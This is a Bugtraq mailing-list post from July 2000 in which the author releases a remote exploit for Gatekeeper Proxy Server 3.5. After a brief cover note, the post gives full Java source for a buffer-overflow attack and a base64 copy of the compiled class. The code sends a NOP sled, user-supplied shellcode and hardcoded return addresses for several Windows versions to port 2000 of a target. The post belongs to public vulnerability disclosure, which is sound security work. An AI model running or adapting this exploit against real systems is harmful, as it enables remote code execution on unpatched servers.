[15774] in bugtraq
The MDMA Crew's GateKeeper Exploit
daemon@ATHENA.MIT.EDU (wizdumb@MDMA.ZA.NET)
Thu Jul 13 20:10:38 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_009B_01BFECF2.7CDC0CE0"
Message-Id: <00af01bfece2$a52cbd80$367e1ec4@kungphusion>
Date: Thu, 13 Jul 2000 17:48:01 +0200
Reply-To: wizdumb@MDMA.ZA.NET
From: wizdumb@MDMA.ZA.NET
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_009B_01BFECF2.7CDC0CE0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
I covered a flaw in Gatekeeper 3.5 about a month ago. Well, Gatekeeper 3.6 is
out now, and I'm assuming it's fixed, so it's safe to release some exploit
code. Find the Java src and the bytecode attached.
Cheers,
Wizdumb
------=_NextPart_000_009B_01BFECF2.7CDC0CE0
Content-Type: application/octet-stream;
name="gkwarez.java"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="gkwarez.java"
/* gkwarez.java by Andrew Lewis aka. Wizdumb
* <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC>
*
* Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
* Written as proof of concept code only - the MDMA crew do not condone
* illegal activities in any way what-so-ever.
*
* This code is now public - Gatekeeper version 3.6 is out. :-)
*
* Shellcode is handled plug and play style for flexibility and defence
* against script kiddies. :) Oh, and coz I'm too dumb to make some and =
too
* lazy to find some. :P Also note that nulls in your shellcode are fine =
for
* this daemon - just beware of terminating newlines.
*
* Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
*/
import java.io.*;
import java.net.*;
class gkwarez {
public static void main(String[] args) throws IOException {
if (args.length !=3D 3) {
System.out.println("Syntax: java gkwarez [host] [shellcode-file] =
[version]\n");
System.out.println("Shellcode file is code you want to execute on =
the host");
System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 =
(NT4/SP3) and 4 (NT4/SP4)");
System.exit(1); }
int c;
Socket soq =3D null;
char[] wet =3D null;
PrintWriter white =3D null;
BufferedReader hellkode =3D null;
=20
char nop =3D 0x90;
char[] jmpcode =3D { 0xE9, 0xF9, 0xEF, 0x90 };
=20
// Static addys for "call eax" (backwards) - any1 know of more? mail =
me. :)
char[] retwin95 =3D { 0x30, 0x11, 0x71, 0x7F };
char[] retwin98 =3D { 0x7B, 0xFF, 0xF7, 0xBF };
char[] retntsp3 =3D { 0xC7, 0x5A, 0xFA, 0x77 };
char[] retntsp4 =3D { 0x5D, 0x63, 0xF7, 0x77 };
=20
try {
switch (Integer.parseInt(args[2])) {
case 95:
wet =3D retwin95;
break;
case 98:
wet =3D retwin98;
break;
case 3:
wet =3D retntsp3;
break;
case 4:
wet =3D retntsp4;
break;
default:
System.out.println("Version specified invalid: Expecting 95, 98, =
3, or 4");
System.exit(1);
break; } } catch (Exception e) {
System.out.println("Version specified invalid: Expecting 95, =
98, 3, or 4");
System.exit(1); }
=20
try {
hellkode =3D new BufferedReader(new FileReader(args[1]));
} catch (Exception e) {
System.out.println("Unable to open file: " + args[1]);
System.exit(1); }
=20
try {
soq =3D new Socket(args[0], 2000);
white =3D new PrintWriter(soq.getOutputStream(), true);
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }
=20
for (int i =3D 0; i <=3D 4800; i++) {
if ((c =3D hellkode.read()) !=3D -1) {
white.write(c);
if (i =3D=3D 4096) {
System.out.println("Shellcode specified is too big (4095 bytes =
max). Bailing out...");
System.exit(1); } }
else {
if (i =3D=3D 4096) {
white.print(jmpcode);
white.print(wet); }
else white.print(nop); } }
white.println();
System.out.println("Payload sent!"); } }
------=_NextPart_000_009B_01BFECF2.7CDC0CE0
Content-Type: application/octet-stream;
name="gkwarez.class"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="gkwarez.class"
yv66vgADAC0AbggATAgATQgATggATwgAUQgAUggAUwgAVAgAVQcAWQcAWwcAXAcAXQcAXgcAXwcA
YAcAYQcAYgcAYwcAZAcAZQoAEgAoCgAPACkKAAsAKgoADAArCgATACsKABUALAoAEwAtCgAUAC4K
ABUALwkAFAAwCgARADEKAA8AMgoADwAzCgAPADQKAA4ANQoACwA2CgATADcKAA8AOAwARwA8DABH
AD8MAEcAQAwARwBDDABHAEQMAFYAQgwAVwA+DABYADoMAGcASwwAaABBDABpAD0MAGkARQwAagA8
DABqAEMMAGsAOQwAbAA7DABtAD4BAAMoKUkBABgoKUxqYXZhL2lvL091dHB1dFN0cmVhbTsBABQo
KUxqYXZhL2xhbmcvU3RyaW5nOwEAAygpVgEABChDKVYBAAQoSSlWAQAaKExqYXZhL2lvL091dHB1
dFN0cmVhbTtaKVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAVKExqYXZhL2xhbmcvU3RyaW5nOylJ
AQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1ZmZlcjsBABUoTGphdmEv
bGFuZy9TdHJpbmc7KVYBABYoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAFKFtDKVYBABYoW0xqYXZh
L2xhbmcvU3RyaW5nOylWAQAGPGluaXQ+AQAEQ29kZQEACkV4Y2VwdGlvbnMBAA9MaW5lTnVtYmVy
VGFibGUBABVMamF2YS9pby9QcmludFN0cmVhbTsBAA1QYXlsb2FkIHNlbnQhAQAXUHJvYmxlbXMg
Y29ubmVjdGluZyA6LS8BADZTaGVsbGNvZGUgZmlsZSBpcyBjb2RlIHlvdSB3YW50IHRvIGV4ZWN1
dGUgb24gdGhlIGhvc3QBAD9TaGVsbGNvZGUgc3BlY2lmaWVkIGlzIHRvbyBiaWcgKDQwOTUgYnl0
ZXMgbWF4KS4gQmFpbGluZyBvdXQuLi4BAApTb3VyY2VGaWxlAQA3U3ludGF4OiBqYXZhIGdrd2Fy
ZXogW2hvc3RdIFtzaGVsbGNvZGUtZmlsZV0gW3ZlcnNpb25dCgEAFVVuYWJsZSB0byBvcGVuIGZp
bGU6IAEARlZhbGlkIHZlcnNpb25zIGFyZSA5NSAoV2luOTUpLCA5OCAoV2luOTgpLCAzIChOVDQv
U1AzKSBhbmQgNCAoTlQ0L1NQNCkBADRWZXJzaW9uIHNwZWNpZmllZCBpbnZhbGlkOiBFeHBlY3Rp
bmcgOTUsIDk4LCAzLCBvciA0AQAFXWPDt3cBAAZhcHBlbmQBAARleGl0AQAPZ2V0T3V0cHV0U3Ry
ZWFtAQAHZ2t3YXJlegEADGdrd2FyZXouamF2YQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBABJq
YXZhL2lvL0ZpbGVSZWFkZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YS9pby9QcmludFN0
cmVhbQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9s
YW5nL0ludGVnZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAWamF2YS9sYW5nL1N0cmluZ0J1ZmZlcgEA
EGphdmEvbGFuZy9TeXN0ZW0BAA9qYXZhL25ldC9Tb2NrZXQBAARtYWluAQADb3V0AQAIcGFyc2VJ
bnQBAAVwcmludAEAB3ByaW50bG4BAARyZWFkAQAIdG9TdHJpbmcBAAV3cml0ZQAgAAoAEgAAAAAA
AgAAAEcAPAABAEgAAAAdAAEAAQAAAAUqtwAWsQAAAAEASgAAAAYAAQAAABcACQBmAEYAAgBIAAAD
AQAGAA4AAAHlKr4GnwAfsgAfEgW2ACSyAB8SA7YAJLIAHxIHtgAkBLgAHQFNAU4BOgQBOgURAJA2
Bge8BVkDEQDpVVkEEQD5VVkFEQDvVVkGEQCQVToHB7wFWQMQMFVZBBARVVkFEHFVWQYQf1U6CAe8
BVkDEHtVWQQRAP9VWQURAPdVWQYRAL9VOgkHvAVZAxEAx1VZBBBaVVkFEQD6VVkGEHdVOgoHvAVZ
AxBdVVkEEGNVWQURAPdVWQYQd1U6CxIJOgwqBTK4ACCrAAAAAEIAAAAEAAAAAwAAADYAAAAEAAAA
PAAAAF8AAAAqAAAAYgAAADAZCE6nADEZCU6nACsZCk6nACUZC06nAB+yAB8SCLYAJAS4AB2nABBX
sgAfEgi2ACQEuAAduwALWbsADFkqBDK3ABm3ABg6BacAIFeyAB+7ABNZEga3ABoqBDK2ABy2ACa2
ACQEuAAduwAVWSoDMhEH0LcAG027AA9ZLLYAHgS3ABc6BKcAEFeyAB8SArYAJAS4AB0DNg2nAE0Z
BbYAJVk8Ap8AIBkEG7YAJxUNERAAoAAxsgAfEgS2ACQEuAAdpwAiFQ0REACgABMZBBkHtgAiGQQt
tgAipwAKGQQVBrYAIYQNARUNERLApP+xGQS2ACOyAB8SAbYAJLEAAwC8ARMBEwAQASABMwE2ABAB
UwFvAXIAEAABAEoAAADyADwAAAAbAAYAHAAOAB0AFgAeAB4AHwAiACIAJAAjACYAJAApACUALAAn
ADEAKABOACsAZwAsAIMALQCeAC4AuAAvALwAMQC8ADIA7AA0AO8ANQDyADcA9QA4APgAOgD7ADsA
/gA9AQEAPgEEAEABDABBARAAQgEUAEMBHABEASAARgEgAEcBMwBGATYASAE3AEkBTwBKAVMATAFT
AE0BYQBOAW8ATAFyAE8BcwBQAXsAUQF/AFMBhQBUAZAAVQGWAFYBngBXAaYAWAGqAFQBrQBaAbUA
WwG8AFwBwgBaAcUAXQHMAFMB1wBeAdwAXwHkABkASQAAAAQAAQANAAEAUAAAAAIAWg==
------=_NextPart_000_009B_01BFECF2.7CDC0CE0--
